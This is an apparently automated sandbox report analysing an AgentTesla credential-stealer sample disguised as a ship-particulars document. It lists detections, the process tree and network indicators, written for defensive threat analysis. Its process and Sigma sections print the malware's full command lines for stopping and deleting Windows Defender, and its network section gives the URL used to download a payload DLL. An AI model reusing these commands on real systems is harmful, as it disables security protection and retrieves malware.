Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report VESSEL PARTICULARS - NYK LINE.doc.exe

Overview

General Information

Sample Name:VESSEL PARTICULARS - NYK LINE.doc.exe
Analysis ID:492154
MD5:93445df2c96362810e0395c5c867700e
SHA1:645f936406b04fbfb737bbffb5678d5255c6ec34
SHA256:ecb4fe719a7fc1365d70ec9db8b3c74cb4bf8968324c25d3817fcc5628fae6fa
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Suspicious Double Extension
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Machine Learning detection for dropped file
Sigma detected: Powershell Used To Disable Windows Defender AV Security Monitoring
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to launch a program with higher privileges
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Sigma detected: PowerShell Script Run in AppData

Classification

Process Tree

  • System is w10x64
  • VESSEL PARTICULARS - NYK LINE.doc.exe (PID: 5204 cmdline: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' MD5: 93445DF2C96362810E0395C5C867700E)
    • powershell.exe (PID: 1688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5512 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 6200 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5296 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • AdvancedRun.exe (PID: 1308 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6276 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001D.00000002.775407725.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.3e69930.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4138aa8.5.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.3.VESSEL PARTICULARS - NYK LINE.doc.exe.4110a88.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Double ExtensionShow sources
                      Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, CommandLine: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, CommandLine|base64offset|contains: <S %, Image: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe, ProcessId: 6248
                      Sigma detected: Powershell Used To Disable Windows Defender AV Security MonitoringShow sources
                      Source: Process startedAuthor: ok @securonix invrep-de, oscd.community, frack113: Data: Command: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, CommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, CommandLine|base64offset|contains: E)^, Image: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run, ProcessId: 6200
                      Sigma detected: PowerShell Script Run in AppDataShow sources
                      Source: Process startedAuthor: Florian Roth, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, CommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, CommandLine|base64offset|contains: E)^, Image: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run, ProcessId: 1308
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, CommandLine|base64offset|contains: M-*'-, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe' , ParentImage: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe, ParentProcessId: 5204, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com, ProcessId: 1688
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132773302471000253.1688.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeVirustotal: Detection: 59%Perma Link
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeMetadefender: Detection: 31%Perma Link
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeReversingLabs: Detection: 85%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exeVirustotal: Detection: 59%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exeMetadefender: Detection: 31%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exeReversingLabs: Detection: 85%
                      Machine Learning detection for sampleShow sources
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exeJoe Sandbox ML: detected
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: unknownHTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49746 version: TLS 1.2
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000013.00000000.459126690.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000014.00000002.472251440.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmp
                      Source: global trafficHTTP traffic detected: GET /download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.507420763.00000000084C2000.00000004.00000001.sdmpString found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.coml equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.507420763.00000000084C2000.00000004.00000001.sdmpString found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com equals www.twitter.com (Twitter)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: Test-Connection www.facebook.com equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: Test-Connection www.twitter.com equals www.twitter.com (Twitter)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: l Test-Connection www.facebook.com equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501955003.0000000000BB2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000000.493939002.0000000000202000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000000.495329702.00000000000D2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000002.497049822.00000000000C2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498216890.00000000002F2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498857847.0000000000112000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000000.500015340.0000000000252000.00000002.00020000.sdmpString found in binary or memory: powershell=Test-Connection www.google.comATest-Connection www.facebook.com?Test-Connection www.twitter.com5System.Reflection.AssemblyLoad?SmartAssembly.Dictionaries.Algo equals www.facebook.com (Facebook)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501955003.0000000000BB2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000000.493939002.0000000000202000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000000.495329702.00000000000D2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000002.497049822.00000000000C2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498216890.00000000002F2000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498857847.0000000000112000.00000002.00020000.sdmp, VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000000.500015340.0000000000252000.00000002.00020000.sdmpString found in binary or memory: powershell=Test-Connection www.google.comATest-Connection www.facebook.com?Test-Connection www.twitter.com5System.Reflection.AssemblyLoad?SmartAssembly.Dictionaries.Algo equals www.twitter.com (Twitter)
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503030346.0000000001422000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.506277572.0000000006FC2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503252579.0000000002E61000.00000004.00000001.sdmpString found in binary or memory: https://store2.gofile.io
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeString found in binary or memory: https://store2.gofile.io/download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownDNS traffic detected: queries for: www.google.com
                      Source: global trafficHTTP traffic detected: GET /download/956f4086-c03d-4dbb-9647-f6db09f6a8b5/Iyybawggybiqbtxofebfdynt.dll HTTP/1.1Host: store2.gofile.ioConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 31.14.69.10:443 -> 192.168.2.5:49746 version: TLS 1.2
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502784542.000000000134B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_012C29F0
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_012C04C4
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEC0E4
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEE520
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeCode function: 0_2_02CEE530
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIyybawggybiqbtxofebfdynt.dll" vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.501981683.0000000000BB8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQGvRlHZGzAmlopEnIbagoK.exe4 vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000002.502784542.000000000134B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000017.00000002.494829249.0000000000208000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000018.00000002.495891381.00000000000D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000019.00000000.496472615.00000000000C8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001A.00000002.498233586.00000000002F8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001B.00000000.498937988.0000000000118000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, 0000001C.00000002.500615281.0000000000258000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAzuka.exe vs VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeVirustotal: Detection: 59%
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeMetadefender: Detection: 31%
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeReversingLabs: Detection: 85%
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeJump to behavior
